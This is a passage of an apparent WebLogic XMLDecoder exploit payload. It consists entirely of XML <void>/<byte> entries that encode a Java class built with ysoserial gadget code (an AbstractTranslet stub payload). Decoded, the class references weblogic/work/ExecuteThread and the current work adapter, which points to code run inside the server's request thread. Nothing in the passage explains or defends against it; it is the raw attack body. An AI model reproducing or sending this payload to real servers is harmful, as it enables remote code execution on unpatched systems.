index=\"1043\"><byte>115</byte></void><void index=\"1044\"><byte>117</byte></void><void index=\"1045\"><byte>110</byte></void><void index=\"1046\"><byte>47</byte></void><void index=\"1047\"><byte>111</byte></void><void index=\"1048\"><byte>114</byte></void><void index=\"1049\"><byte>103</byte></void><void index=\"1050\"><byte>47</byte></void><void index=\"1051\"><byte>97</byte></void><void index=\"1052\"><byte>112</byte></void><void index=\"1053\"><byte>97</byte></void><void index=\"1054\"><byte>99</byte></void><void index=\"1055\"><byte>104</byte></void><void index=\"1056\"><byte>101</byte></void><void index=\"1057\"><byte>47</byte></void><void index=\"1058\"><byte>120</byte></void><void index=\"1059\"><byte>97</byte></void><void index=\"1060\"><byte>108</byte></void><void index=\"1061\"><byte>97</byte></void><void index=\"1062\"><byte>110</byte></void><void index=\"1063\"><byte>47</byte></void><void index=\"1064\"><byte>105</byte></void><void index=\"1065\"><byte>110</byte></void><void index=\"1066\"><byte>116</byte></void><void index=\"1067\"><byte>101</byte></void><void index=\"1068\"><byte>114</byte></void><void index=\"1069\"><byte>110</byte></void><void index=\"1070\"><byte>97</byte></void><void index=\"1071\"><byte>108</byte></void><void index=\"1072\"><byte>47</byte></void><void index=\"1073\"><byte>120</byte></void><void index=\"1074\"><byte>115</byte></void><void index=\"1075\"><byte>108</byte></void><void index=\"1076\"><byte>116</byte></void><void index=\"1077\"><byte>99</byte></void><void index=\"1078\"><byte>47</byte></void><void index=\"1079\"><byte>68</byte></void><void index=\"1080\"><byte>79</byte></void><void index=\"1081\"><byte>77</byte></void><void index=\"1082\"><byte>59</byte></void><void index=\"1083\"><byte>76</byte></void><void index=\"1084\"><byte>99</byte></void><void index=\"1085\"><byte>111</byte></void><void index=\"1086\"><byte>109</byte></void><void index=\"1087\"><byte>47</byte></void><void index=\"1088\"><byte>115</byte></void><void index=\"1089\"><byte>117</byte></void><void index=\"1090\"><byte>110</byte></void><void index=\"1091\"><byte>47</byte></void><void index=\"1092\"><byte>111</byte></void><void index=\"1093\"><byte>114</byte></void><void index=\"1094\"><byte>103</byte></void><void index=\"1095\"><byte>47</byte></void><void index=\"1096\"><byte>97</byte></void><void index=\"1097\"><byte>112</byte></void><void index=\"1098\"><byte>97</byte></void><void index=\"1099\"><byte>99</byte></void><void index=\"1100\"><byte>104</byte></void><void index=\"1101\"><byte>101</byte></void><void index=\"1102\"><byte>47</byte></void><void index=\"1103\"><byte>120</byte></void><void index=\"1104\"><byte>109</byte></void><void index=\"1105\"><byte>108</byte></void><void index=\"1106\"><byte>47</byte></void><void index=\"1107\"><byte>105</byte></void><void index=\"1108\"><byte>110</byte></void><void index=\"1109\"><byte>116</byte></void><void index=\"1110\"><byte>101</byte></void><void index=\"1111\"><byte>114</byte></void><void index=\"1112\"><byte>110</byte></void><void index=\"1113\"><byte>97</byte></void><void index=\"1114\"><byte>108</byte></void><void index=\"1115\"><byte>47</byte></void><void index=\"1116\"><byte>100</byte></void><void index=\"1117\"><byte>116</byte></void><void index=\"1118\"><byte>109</byte></void><void index=\"1119\"><byte>47</byte></void><void index=\"1120\"><byte>68</byte></void><void index=\"1121\"><byte>84</byte></void><void index=\"1122\"><byte>77</byte></void><void index=\"1123\"><byte>65</byte></void><void index=\"1124\"><byte>120</byte></void><void index=\"1125\"><byte>105</byte></void><void index=\"1126\"><byte>115</byte></void><void index=\"1127\"><byte>73</byte></void><void index=\"1128\"><byte>116</byte></void><void index=\"1129\"><byte>101</byte></void><void index=\"1130\"><byte>114</byte></void><void index=\"1131\"><byte>97</byte></void><void index=\"1132\"><byte>116</byte></void><void index=\"1133\"><byte>111</byte></void><void index=\"1134\"><byte>114</byte></void><void index=\"1135\"><byte>59</byte></void><void index=\"1136\"><byte>76</byte></void><void index=\"1137\"><byte>99</byte></void><void index=\"1138\"><byte>111</byte></void><void index=\"1139\"><byte>109</byte></void><void index=\"1140\"><byte>47</byte></void><void index=\"1141\"><byte>115</byte></void><void index=\"1142\"><byte>117</byte></void><void index=\"1143\"><byte>110</byte></void><void index=\"1144\"><byte>47</byte></void><void index=\"1145\"><byte>111</byte></void><void index=\"1146\"><byte>114</byte></void><void index=\"1147\"><byte>103</byte></void><void index=\"1148\"><byte>47</byte></void><void index=\"1149\"><byte>97</byte></void><void index=\"1150\"><byte>112</byte></void><void index=\"1151\"><byte>97</byte></void><void index=\"1152\"><byte>99</byte></void><void index=\"1153\"><byte>104</byte></void><void index=\"1154\"><byte>101</byte></void><void index=\"1155\"><byte>47</byte></void><void index=\"1156\"><byte>120</byte></void><void index=\"1157\"><byte>109</byte></void><void index=\"1158\"><byte>108</byte></void><void index=\"1159\"><byte>47</byte></void><void index=\"1160\"><byte>105</byte></void><void index=\"1161\"><byte>110</byte></void><void index=\"1162\"><byte>116</byte></void><void index=\"1163\"><byte>101</byte></void><void index=\"1164\"><byte>114</byte></void><void index=\"1165\"><byte>110</byte></void><void index=\"1166\"><byte>97</byte></void><void index=\"1167\"><byte>108</byte></void><void index=\"1168\"><byte>47</byte></void><void index=\"1169\"><byte>115</byte></void><void index=\"1170\"><byte>101</byte></void><void index=\"1171\"><byte>114</byte></void><void index=\"1172\"><byte>105</byte></void><void index=\"1173\"><byte>97</byte></void><void index=\"1174\"><byte>108</byte></void><void index=\"1175\"><byte>105</byte></void><void index=\"1176\"><byte>122</byte></void><void index=\"1177\"><byte>101</byte></void><void index=\"1178\"><byte>114</byte></void><void index=\"1179\"><byte>47</byte></void><void index=\"1180\"><byte>83</byte></void><void index=\"1181\"><byte>101</byte></void><void index=\"1182\"><byte>114</byte></void><void index=\"1183\"><byte>105</byte></void><void index=\"1184\"><byte>97</byte></void><void index=\"1185\"><byte>108</byte></void><void index=\"1186\"><byte>105</byte></void><void index=\"1187\"><byte>122</byte></void><void index=\"1188\"><byte>97</byte></void><void index=\"1189\"><byte>116</byte></void><void index=\"1190\"><byte>105</byte></void><void index=\"1191\"><byte>111</byte></void><void index=\"1192\"><byte>110</byte></void><void index=\"1193\"><byte>72</byte></void><void index=\"1194\"><byte>97</byte></void><void index=\"1195\"><byte>110</byte></void><void index=\"1196\"><byte>100</byte></void><void index=\"1197\"><byte>108</byte></void><void index=\"1198\"><byte>101</byte></void><void index=\"1199\"><byte>114</byte></void><void index=\"1200\"><byte>59</byte></void><void index=\"1201\"><byte>41</byte></void><void index=\"1202\"><byte>86</byte></void><void index=\"1203\"><byte>1</byte></void><void index=\"1204\"><byte>0</byte></void><void index=\"1205\"><byte>8</byte></void><void index=\"1206\"><byte>105</byte></void><void index=\"1207\"><byte>116</byte></void><void index=\"1208\"><byte>101</byte></void><void index=\"1209\"><byte>114</byte></void><void index=\"1210\"><byte>97</byte></void><void index=\"1211\"><byte>116</byte></void><void index=\"1212\"><byte>111</byte></void><void index=\"1213\"><byte>114</byte></void><void index=\"1214\"><byte>1</byte></void><void index=\"1215\"><byte>0</byte></void><void index=\"1216\"><byte>53</byte></void><void index=\"1217\"><byte>76</byte></void><void index=\"1218\"><byte>99</byte></void><void index=\"1219\"><byte>111</byte></void><void index=\"1220\"><byte>109</byte></void><void index=\"1221\"><byte>47</byte></void><void index=\"1222\"><byte>115</byte></void><void index=\"1223\"><byte>117</byte></void><void index=\"1224\"><byte>110</byte></void><void index=\"1225\"><byte>47</byte></void><void index=\"1226\"><byte>111</byte></void><void index=\"1227\"><byte>114</byte></void><void index=\"1228\"><byte>103</byte></void><void index=\"1229\"><byte>47</byte></void><void index=\"1230\"><byte>97</byte></void><void index=\"1231\"><byte>112</byte></void><void index=\"1232\"><byte>97</byte></void><void index=\"1233\"><byte>99</byte></void><void index=\"1234\"><byte>104</byte></void><void index=\"1235\"><byte>101</byte></void><void index=\"1236\"><byte>47</byte></void><void index=\"1237\"><byte>120</byte></void><void index=\"1238\"><byte>109</byte></void><void index=\"1239\"><byte>108</byte></void><void index=\"1240\"><byte>47</byte></void><void index=\"1241\"><byte>105</byte></void><void index=\"1242\"><byte>110</byte></void><void index=\"1243\"><byte>116</byte></void><void index=\"1244\"><byte>101</byte></void><void index=\"1245\"><byte>114</byte></void><void index=\"1246\"><byte>110</byte></void><void index=\"1247\"><byte>97</byte></void><void index=\"1248\"><byte>108</byte></void><void index=\"1249\"><byte>47</byte></void><void index=\"1250\"><byte>100</byte></void><void index=\"1251\"><byte>116</byte></void><void index=\"1252\"><byte>109</byte></void><void index=\"1253\"><byte>47</byte></void><void index=\"1254\"><byte>68</byte></void><void index=\"1255\"><byte>84</byte></void><void index=\"1256\"><byte>77</byte></void><void index=\"1257\"><byte>65</byte></void><void index=\"1258\"><byte>120</byte></void><void index=\"1259\"><byte>105</byte></void><void index=\"1260\"><byte>115</byte></void><void index=\"1261\"><byte>73</byte></void><void index=\"1262\"><byte>116</byte></void><void index=\"1263\"><byte>101</byte></void><void index=\"1264\"><byte>114</byte></void><void index=\"1265\"><byte>97</byte></void><void index=\"1266\"><byte>116</byte></void><void index=\"1267\"><byte>111</byte></void><void index=\"1268\"><byte>114</byte></void><void index=\"1269\"><byte>59</byte></void><void index=\"1270\"><byte>1</byte></void><void index=\"1271\"><byte>0</byte></void><void index=\"1272\"><byte>7</byte></void><void index=\"1273\"><byte>104</byte></void><void index=\"1274\"><byte>97</byte></void><void index=\"1275\"><byte>110</byte></void><void index=\"1276\"><byte>100</byte></void><void index=\"1277\"><byte>108</byte></void><void index=\"1278\"><byte>101</byte></void><void index=\"1279\"><byte>114</byte></void><void index=\"1280\"><byte>1</byte></void><void index=\"1281\"><byte>0</byte></void><void index=\"1282\"><byte>65</byte></void><void index=\"1283\"><byte>76</byte></void><void index=\"1284\"><byte>99</byte></void><void index=\"1285\"><byte>111</byte></void><void index=\"1286\"><byte>109</byte></void><void index=\"1287\"><byte>47</byte></void><void index=\"1288\"><byte>115</byte></void><void index=\"1289\"><byte>117</byte></void><void index=\"1290\"><byte>110</byte></void><void index=\"1291\"><byte>47</byte></void><void index=\"1292\"><byte>111</byte></void><void index=\"1293\"><byte>114</byte></void><void index=\"1294\"><byte>103</byte></void><void index=\"1295\"><byte>47</byte></void><void index=\"1296\"><byte>97</byte></void><void index=\"1297\"><byte>112</byte></void><void index=\"1298\"><byte>97</byte></void><void index=\"1299\"><byte>99</byte></void><void index=\"1300\"><byte>104</byte></void><void index=\"1301\"><byte>101</byte></void><void index=\"1302\"><byte>47</byte></void><void index=\"1303\"><byte>120</byte></void><void index=\"1304\"><byte>109</byte></void><void index=\"1305\"><byte>108</byte></void><void index=\"1306\"><byte>47</byte></void><void index=\"1307\"><byte>105</byte></void><void index=\"1308\"><byte>110</byte></void><void index=\"1309\"><byte>116</byte></void><void index=\"1310\"><byte>101</byte></void><void index=\"1311\"><byte>114</byte></void><void index=\"1312\"><byte>110</byte></void><void index=\"1313\"><byte>97</byte></void><void index=\"1314\"><byte>108</byte></void><void index=\"1315\"><byte>47</byte></void><void index=\"1316\"><byte>115</byte></void><void index=\"1317\"><byte>101</byte></void><void index=\"1318\"><byte>114</byte></void><void index=\"1319\"><byte>105</byte></void><void index=\"1320\"><byte>97</byte></void><void index=\"1321\"><byte>108</byte></void><void index=\"1322\"><byte>105</byte></void><void index=\"1323\"><byte>122</byte></void><void index=\"1324\"><byte>101</byte></void><void index=\"1325\"><byte>114</byte></void><void index=\"1326\"><byte>47</byte></void><void index=\"1327\"><byte>83</byte></void><void index=\"1328\"><byte>101</byte></void><void index=\"1329\"><byte>114</byte></void><void index=\"1330\"><byte>105</byte></void><void index=\"1331\"><byte>97</byte></void><void index=\"1332\"><byte>108</byte></void><void index=\"1333\"><byte>105</byte></void><void index=\"1334\"><byte>122</byte></void><void index=\"1335\"><byte>97</byte></void><void index=\"1336\"><byte>116</byte></void><void index=\"1337\"><byte>105</byte></void><void index=\"1338\"><byte>111</byte></void><void index=\"1339\"><byte>110</byte></void><void index=\"1340\"><byte>72</byte></void><void index=\"1341\"><byte>97</byte></void><void index=\"1342\"><byte>110</byte></void><void index=\"1343\"><byte>100</byte></void><void index=\"1344\"><byte>108</byte></void><void index=\"1345\"><byte>101</byte></void><void index=\"1346\"><byte>114</byte></void><void index=\"1347\"><byte>59</byte></void><void index=\"1348\"><byte>1</byte></void><void index=\"1349\"><byte>0</byte></void><void index=\"1350\"><byte>10</byte></void><void index=\"1351\"><byte>83</byte></void><void index=\"1352\"><byte>111</byte></void><void index=\"1353\"><byte>117</byte></void><void index=\"1354\"><byte>114</byte></void><void index=\"1355\"><byte>99</byte></void><void index=\"1356\"><byte>101</byte></void><void index=\"1357\"><byte>70</byte></void><void index=\"1358\"><byte>105</byte></void><void index=\"1359\"><byte>108</byte></void><void index=\"1360\"><byte>101</byte></void><void index=\"1361\"><byte>1</byte></void><void index=\"1362\"><byte>0</byte></void><void index=\"1363\"><byte>12</byte></void><void index=\"1364\"><byte>71</byte></void><void index=\"1365\"><byte>97</byte></void><void index=\"1366\"><byte>100</byte></void><void index=\"1367\"><byte>103</byte></void><void index=\"1368\"><byte>101</byte></void><void index=\"1369\"><byte>116</byte></void><void index=\"1370\"><byte>115</byte></void><void index=\"1371\"><byte>46</byte></void><void index=\"1372\"><byte>106</byte></void><void index=\"1373\"><byte>97</byte></void><void index=\"1374\"><byte>118</byte></void><void index=\"1375\"><byte>97</byte></void><void index=\"1376\"><byte>12</byte></void><void index=\"1377\"><byte>0</byte></void><void index=\"1378\"><byte>10</byte></void><void index=\"1379\"><byte>0</byte></void><void index=\"1380\"><byte>11</byte></void><void index=\"1381\"><byte>7</byte></void><void index=\"1382\"><byte>0</byte></void><void index=\"1383\"><byte>40</byte></void><void index=\"1384\"><byte>1</byte></void><void index=\"1385\"><byte>0</byte></void><void index=\"1386\"><byte>51</byte></void><void index=\"1387\"><byte>121</byte></void><void index=\"1388\"><byte>115</byte></void><void index=\"1389\"><byte>111</byte></void><void index=\"1390\"><byte>115</byte></void><void index=\"1391\"><byte>101</byte></void><void index=\"1392\"><byte>114</byte></void><void index=\"1393\"><byte>105</byte></void><void index=\"1394\"><byte>97</byte></void><void index=\"1395\"><byte>108</byte></void><void index=\"1396\"><byte>47</byte></void><void index=\"1397\"><byte>112</byte></void><void index=\"1398\"><byte>97</byte></void><void index=\"1399\"><byte>121</byte></void><void index=\"1400\"><byte>108</byte></void><void index=\"1401\"><byte>111</byte></void><void index=\"1402\"><byte>97</byte></void><void index=\"1403\"><byte>100</byte></void><void index=\"1404\"><byte>115</byte></void><void index=\"1405\"><byte>47</byte></void><void index=\"1406\"><byte>117</byte></void><void index=\"1407\"><byte>116</byte></void><void index=\"1408\"><byte>105</byte></void><void index=\"1409\"><byte>108</byte></void><void index=\"1410\"><byte>47</byte></void><void index=\"1411\"><byte>71</byte></void><void index=\"1412\"><byte>97</byte></void><void index=\"1413\"><byte>100</byte></void><void index=\"1414\"><byte>103</byte></void><void index=\"1415\"><byte>101</byte></void><void index=\"1416\"><byte>116</byte></void><void index=\"1417\"><byte>115</byte></void><void index=\"1418\"><byte>36</byte></void><void index=\"1419\"><byte>83</byte></void><void index=\"1420\"><byte>116</byte></void><void index=\"1421\"><byte>117</byte></void><void index=\"1422\"><byte>98</byte></void><void index=\"1423\"><byte>84</byte></void><void index=\"1424\"><byte>114</byte></void><void index=\"1425\"><byte>97</byte></void><void index=\"1426\"><byte>110</byte></void><void index=\"1427\"><byte>115</byte></void><void index=\"1428\"><byte>108</byte></void><void index=\"1429\"><byte>101</byte></void><void index=\"1430\"><byte>116</byte></void><void index=\"1431\"><byte>80</byte></void><void index=\"1432\"><byte>97</byte></void><void index=\"1433\"><byte>121</byte></void><void index=\"1434\"><byte>108</byte></void><void index=\"1435\"><byte>111</byte></void><void index=\"1436\"><byte>97</byte></void><void index=\"1437\"><byte>100</byte></void><void index=\"1438\"><byte>1</byte></void><void index=\"1439\"><byte>0</byte></void><void index=\"1440\"><byte>64</byte></void><void index=\"1441\"><byte>99</byte></void><void index=\"1442\"><byte>111</byte></void><void index=\"1443\"><byte>109</byte></void><void index=\"1444\"><byte>47</byte></void><void index=\"1445\"><byte>115</byte></void><void index=\"1446\"><byte>117</byte></void><void index=\"1447\"><byte>110</byte></void><void index=\"1448\"><byte>47</byte></void><void index=\"1449\"><byte>111</byte></void><void index=\"1450\"><byte>114</byte></void><void index=\"1451\"><byte>103</byte></void><void index=\"1452\"><byte>47</byte></void><void index=\"1453\"><byte>97</byte></void><void index=\"1454\"><byte>112</byte></void><void index=\"1455\"><byte>97</byte></void><void index=\"1456\"><byte>99</byte></void><void index=\"1457\"><byte>104</byte></void><void index=\"1458\"><byte>101</byte></void><void index=\"1459\"><byte>47</byte></void><void index=\"1460\"><byte>120</byte></void><void index=\"1461\"><byte>97</byte></void><void index=\"1462\"><byte>108</byte></void><void index=\"1463\"><byte>97</byte></void><void index=\"1464\"><byte>110</byte></void><void index=\"1465\"><byte>47</byte></void><void index=\"1466\"><byte>105</byte></void><void index=\"1467\"><byte>110</byte></void><void index=\"1468\"><byte>116</byte></void><void index=\"1469\"><byte>101</byte></void><void index=\"1470\"><byte>114</byte></void><void index=\"1471\"><byte>110</byte></void><void index=\"1472\"><byte>97</byte></void><void index=\"1473\"><byte>108</byte></void><void index=\"1474\"><byte>47</byte></void><void index=\"1475\"><byte>120</byte></void><void index=\"1476\"><byte>115</byte></void><void index=\"1477\"><byte>108</byte></void><void index=\"1478\"><byte>116</byte></void><void index=\"1479\"><byte>99</byte></void><void index=\"1480\"><byte>47</byte></void><void index=\"1481\"><byte>114</byte></void><void index=\"1482\"><byte>117</byte></void><void index=\"1483\"><byte>110</byte></void><void index=\"1484\"><byte>116</byte></void><void index=\"1485\"><byte>105</byte></void><void index=\"1486\"><byte>109</byte></void><void index=\"1487\"><byte>101</byte></void><void index=\"1488\"><byte>47</byte></void><void index=\"1489\"><byte>65</byte></void><void index=\"1490\"><byte>98</byte></void><void index=\"1491\"><byte>115</byte></void><void index=\"1492\"><byte>116</byte></void><void index=\"1493\"><byte>114</byte></void><void index=\"1494\"><byte>97</byte></void><void index=\"1495\"><byte>99</byte></void><void index=\"1496\"><byte>116</byte></void><void index=\"1497\"><byte>84</byte></void><void index=\"1498\"><byte>114</byte></void><void index=\"1499\"><byte>97</byte></void><void index=\"1500\"><byte>110</byte></void><void index=\"1501\"><byte>115</byte></void><void index=\"1502\"><byte>108</byte></void><void index=\"1503\"><byte>101</byte></void><void index=\"1504\"><byte>116</byte></void><void index=\"1505\"><byte>1</byte></void><void index=\"1506\"><byte>0</byte></void><void index=\"1507\"><byte>20</byte></void><void index=\"1508\"><byte>106</byte></void><void index=\"1509\"><byte>97</byte></void><void index=\"1510\"><byte>118</byte></void><void index=\"1511\"><byte>97</byte></void><void index=\"1512\"><byte>47</byte></void><void index=\"1513\"><byte>105</byte></void><void index=\"1514\"><byte>111</byte></void><void index=\"1515\"><byte>47</byte></void><void index=\"1516\"><byte>83</byte></void><void index=\"1517\"><byte>101</byte></void><void index=\"1518\"><byte>114</byte></void><void index=\"1519\"><byte>105</byte></void><void index=\"1520\"><byte>97</byte></void><void index=\"1521\"><byte>108</byte></void><void index=\"1522\"><byte>105</byte></void><void index=\"1523\"><byte>122</byte></void><void index=\"1524\"><byte>97</byte></void><void index=\"1525\"><byte>98</byte></void><void index=\"1526\"><byte>108</byte></void><void index=\"1527\"><byte>101</byte></void><void index=\"1528\"><byte>1</byte></void><void index=\"1529\"><byte>0</byte></void><void index=\"1530\"><byte>57</byte></void><void index=\"1531\"><byte>99</byte></void><void index=\"1532\"><byte>111</byte></void><void index=\"1533\"><byte>109</byte></void><void index=\"1534\"><byte>47</byte></void><void index=\"1535\"><byte>115</byte></void><void index=\"1536\"><byte>117</byte></void><void index=\"1537\"><byte>110</byte></void><void index=\"1538\"><byte>47</byte></void><void index=\"1539\"><byte>111</byte></void><void index=\"1540\"><byte>114</byte></void><void index=\"1541\"><byte>103</byte></void><void index=\"1542\"><byte>47</byte></void><void index=\"1543\"><byte>97</byte></void><void index=\"1544\"><byte>112</byte></void><void index=\"1545\"><byte>97</byte></void><void index=\"1546\"><byte>99</byte></void><void index=\"1547\"><byte>104</byte></void><void index=\"1548\"><byte>101</byte></void><void index=\"1549\"><byte>47</byte></void><void index=\"1550\"><byte>120</byte></void><void index=\"1551\"><byte>97</byte></void><void index=\"1552\"><byte>108</byte></void><void index=\"1553\"><byte>97</byte></void><void index=\"1554\"><byte>110</byte></void><void index=\"1555\"><byte>47</byte></void><void index=\"1556\"><byte>105</byte></void><void index=\"1557\"><byte>110</byte></void><void index=\"1558\"><byte>116</byte></void><void index=\"1559\"><byte>101</byte></void><void index=\"1560\"><byte>114</byte></void><void index=\"1561\"><byte>110</byte></void><void index=\"1562\"><byte>97</byte></void><void index=\"1563\"><byte>108</byte></void><void index=\"1564\"><byte>47</byte></void><void index=\"1565\"><byte>120</byte></void><void index=\"1566\"><byte>115</byte></void><void index=\"1567\"><byte>108</byte></void><void index=\"1568\"><byte>116</byte></void><void index=\"1569\"><byte>99</byte></void><void index=\"1570\"><byte>47</byte></void><void index=\"1571\"><byte>84</byte></void><void index=\"1572\"><byte>114</byte></void><void index=\"1573\"><byte>97</byte></void><void index=\"1574\"><byte>110</byte></void><void index=\"1575\"><byte>115</byte></void><void index=\"1576\"><byte>108</byte></void><void index=\"1577\"><byte>101</byte></void><void index=\"1578\"><byte>116</byte></void><void index=\"1579\"><byte>69</byte></void><void index=\"1580\"><byte>120</byte></void><void index=\"1581\"><byte>99</byte></void><void index=\"1582\"><byte>101</byte></void><void index=\"1583\"><byte>112</byte></void><void index=\"1584\"><byte>116</byte></void><void index=\"1585\"><byte>105</byte></void><void index=\"1586\"><byte>111</byte></void><void index=\"1587\"><byte>110</byte></void><void index=\"1588\"><byte>1</byte></void><void index=\"1589\"><byte>0</byte></void><void index=\"1590\"><byte>31</byte></void><void index=\"1591\"><byte>121</byte></void><void index=\"1592\"><byte>115</byte></void><void index=\"1593\"><byte>111</byte></void><void index=\"1594\"><byte>115</byte></void><void index=\"1595\"><byte>101</byte></void><void index=\"1596\"><byte>114</byte></void><void index=\"1597\"><byte>105</byte></void><void index=\"1598\"><byte>97</byte></void><void index=\"1599\"><byte>108</byte></void><void index=\"1600\"><byte>47</byte></void><void index=\"1601\"><byte>112</byte></void><void index=\"1602\"><byte>97</byte></void><void index=\"1603\"><byte>121</byte></void><void index=\"1604\"><byte>108</byte></void><void index=\"1605\"><byte>111</byte></void><void index=\"1606\"><byte>97</byte></void><void index=\"1607\"><byte>100</byte></void><void index=\"1608\"><byte>115</byte></void><void index=\"1609\"><byte>47</byte></void><void index=\"1610\"><byte>117</byte></void><void index=\"1611\"><byte>116</byte></void><void index=\"1612\"><byte>105</byte></void><void index=\"1613\"><byte>108</byte></void><void index=\"1614\"><byte>47</byte></void><void index=\"1615\"><byte>71</byte></void><void index=\"1616\"><byte>97</byte></void><void index=\"1617\"><byte>100</byte></void><void index=\"1618\"><byte>103</byte></void><void index=\"1619\"><byte>101</byte></void><void index=\"1620\"><byte>116</byte></void><void index=\"1621\"><byte>115</byte></void><void index=\"1622\"><byte>1</byte></void><void index=\"1623\"><byte>0</byte></void><void index=\"1624\"><byte>8</byte></void><void index=\"1625\"><byte>60</byte></void><void index=\"1626\"><byte>99</byte></void><void index=\"1627\"><byte>108</byte></void><void index=\"1628\"><byte>105</byte></void><void index=\"1629\"><byte>110</byte></void><void index=\"1630\"><byte>105</byte></void><void index=\"1631\"><byte>116</byte></void><void index=\"1632\"><byte>62</byte></void><void index=\"1633\"><byte>1</byte></void><void index=\"1634\"><byte>0</byte></void><void index=\"1635\"><byte>16</byte></void><void index=\"1636\"><byte>106</byte></void><void index=\"1637\"><byte>97</byte></void><void index=\"1638\"><byte>118</byte></void><void index=\"1639\"><byte>97</byte></void><void index=\"1640\"><byte>47</byte></void><void index=\"1641\"><byte>108</byte></void><void index=\"1642\"><byte>97</byte></void><void index=\"1643\"><byte>110</byte></void><void index=\"1644\"><byte>103</byte></void><void index=\"1645\"><byte>47</byte></void><void index=\"1646\"><byte>84</byte></void><void index=\"1647\"><byte>104</byte></void><void index=\"1648\"><byte>114</byte></void><void index=\"1649\"><byte>101</byte></void><void index=\"1650\"><byte>97</byte></void><void index=\"1651\"><byte>100</byte></void><void index=\"1652\"><byte>7</byte></void><void index=\"1653\"><byte>0</byte></void><void index=\"1654\"><byte>42</byte></void><void index=\"1655\"><byte>1</byte></void><void index=\"1656\"><byte>0</byte></void><void index=\"1657\"><byte>13</byte></void><void index=\"1658\"><byte>99</byte></void><void index=\"1659\"><byte>117</byte></void><void index=\"1660\"><byte>114</byte></void><void index=\"1661\"><byte>114</byte></void><void index=\"1662\"><byte>101</byte></void><void index=\"1663\"><byte>110</byte></void><void index=\"1664\"><byte>116</byte></void><void index=\"1665\"><byte>84</byte></void><void index=\"1666\"><byte>104</byte></void><void index=\"1667\"><byte>114</byte></void><void index=\"1668\"><byte>101</byte></void><void index=\"1669\"><byte>97</byte></void><void index=\"1670\"><byte>100</byte></void><void index=\"1671\"><byte>1</byte></void><void index=\"1672\"><byte>0</byte></void><void index=\"1673\"><byte>20</byte></void><void index=\"1674\"><byte>40</byte></void><void index=\"1675\"><byte>41</byte></void><void index=\"1676\"><byte>76</byte></void><void index=\"1677\"><byte>106</byte></void><void index=\"1678\"><byte>97</byte></void><void index=\"1679\"><byte>118</byte></void><void index=\"1680\"><byte>97</byte></void><void index=\"1681\"><byte>47</byte></void><void index=\"1682\"><byte>108</byte></void><void index=\"1683\"><byte>97</byte></void><void index=\"1684\"><byte>110</byte></void><void index=\"1685\"><byte>103</byte></void><void index=\"1686\"><byte>47</byte></void><void index=\"1687\"><byte>84</byte></void><void index=\"1688\"><byte>104</byte></void><void index=\"1689\"><byte>114</byte></void><void index=\"1690\"><byte>101</byte></void><void index=\"1691\"><byte>97</byte></void><void index=\"1692\"><byte>100</byte></void><void index=\"1693\"><byte>59</byte></void><void index=\"1694\"><byte>12</byte></void><void index=\"1695\"><byte>0</byte></void><void index=\"1696\"><byte>44</byte></void><void index=\"1697\"><byte>0</byte></void><void index=\"1698\"><byte>45</byte></void><void index=\"1699\"><byte>10</byte></void><void index=\"1700\"><byte>0</byte></void><void index=\"1701\"><byte>43</byte></void><void index=\"1702\"><byte>0</byte></void><void index=\"1703\"><byte>46</byte></void><void index=\"1704\"><byte>1</byte></void><void index=\"1705\"><byte>0</byte></void><void index=\"1706\"><byte>27</byte></void><void index=\"1707\"><byte>119</byte></void><void index=\"1708\"><byte>101</byte></void><void index=\"1709\"><byte>98</byte></void><void index=\"1710\"><byte>108</byte></void><void index=\"1711\"><byte>111</byte></void><void index=\"1712\"><byte>103</byte></void><void index=\"1713\"><byte>105</byte></void><void index=\"1714\"><byte>99</byte></void><void index=\"1715\"><byte>47</byte></void><void index=\"1716\"><byte>119</byte></void><void index=\"1717\"><byte>111</byte></void><void index=\"1718\"><byte>114</byte></void><void index=\"1719\"><byte>107</byte></void><void index=\"1720\"><byte>47</byte></void><void index=\"1721\"><byte>69</byte></void><void index=\"1722\"><byte>120</byte></void><void index=\"1723\"><byte>101</byte></void><void index=\"1724\"><byte>99</byte></void><void index=\"1725\"><byte>117</byte></void><void index=\"1726\"><byte>116</byte></void><void index=\"1727\"><byte>101</byte></void><void index=\"1728\"><byte>84</byte></void><void index=\"1729\"><byte>104</byte></void><void index=\"1730\"><byte>114</byte></void><void index=\"1731\"><byte>101</byte></void><void index=\"1732\"><byte>97</byte></void><void index=\"1733\"><byte>100</byte></void><void index=\"1734\"><byte>7</byte></void><void index=\"1735\"><byte>0</byte></void><void index=\"1736\"><byte>48</byte></void><void index=\"1737\"><byte>1</byte></void><void index=\"1738\"><byte>0</byte></void><void index=\"1739\"><byte>14</byte></void><void index=\"1740\"><byte>103</byte></void><void index=\"1741\"><byte>101</byte></void><void index=\"1742\"><byte>116</byte></void><void index=\"1743\"><byte>67</byte></void><void index=\"1744\"><byte>117</byte></void><void index=\"1745\"><byte>114</byte></void><void index=\"1746\"><byte>114</byte></void><void index=\"1747\"><byte>101</byte></void><void index=\"1748\"><byte>110</byte></void><void index=\"1749\"><byte>116</byte></void><void index=\"1750\"><byte>87</byte></void><void index=\"1751\"><byte>111</byte></void><void index=\"1752\"><byte>114</byte></void><void index=\"1753\"><byte>107</byte></void><void index=\"1754\"><byte>1</byte></void><void index=\"1755\"><byte>0</byte></void><void index=\"1756\"><byte>29</byte></void><void index=\"1757\"><byte>40</byte></void><void index=\"1758\"><byte>41</byte></void><void index=\"1759\"><byte>76</byte></void><void index=\"1760\"><byte>119</byte></void><void index=\"1761\"><byte>101</byte></void><void index=\"1762\"><byte>98</byte></void><void index=\"1763\"><byte>108</byte></void><void index=\"1764\"><byte>111</byte></void><void index=\"1765\"><byte>103</byte></void><void index=\"1766\"><byte>105</byte></void><void index=\"1767\"><byte>99</byte></void><void index=\"1768\"><byte>47</byte></void><void index=\"1769\"><byte>119</byte></void><void index=\"1770\"><byte>111</byte></void><void index=\"1771\"><byte>114</byte></void><void index=\"1772\"><byte>107</byte></void><void index=\"1773\"><byte>47</byte></void><void index=\"1774\"><byte>87</byte></void><void index=\"1775\"><byte>111</byte></void><void index=\"1776\"><byte>114</byte></void><void index=\"1777\"><byte>107</byte></void><void index=\"1778\"><byte>65</byte></void><void index=\"1779\"><byte>100</byte></void><void index=\"1780\"><byte>97</byte></void><void index=\"1781\"><byte>112</byte></void><void index=\"1782\"><byte>116</byte></void><void index=\"1783\"><byte>101</byte></void><void index=\"1784\"><byte>114</byte></void><void index=\"1785\"><byte>59</byte></void><void index=\"1786\"><byte>12</byte></void><void index=\"1787\"><byte>0</byte></void><void index=\"1788\"><byte>50</byte></void><void index=\"1789\"><byte>0</byte></void><void index=\"1790\"><byte>51</byte></void><void index=\"1791\"><byte>10</byte></void><void 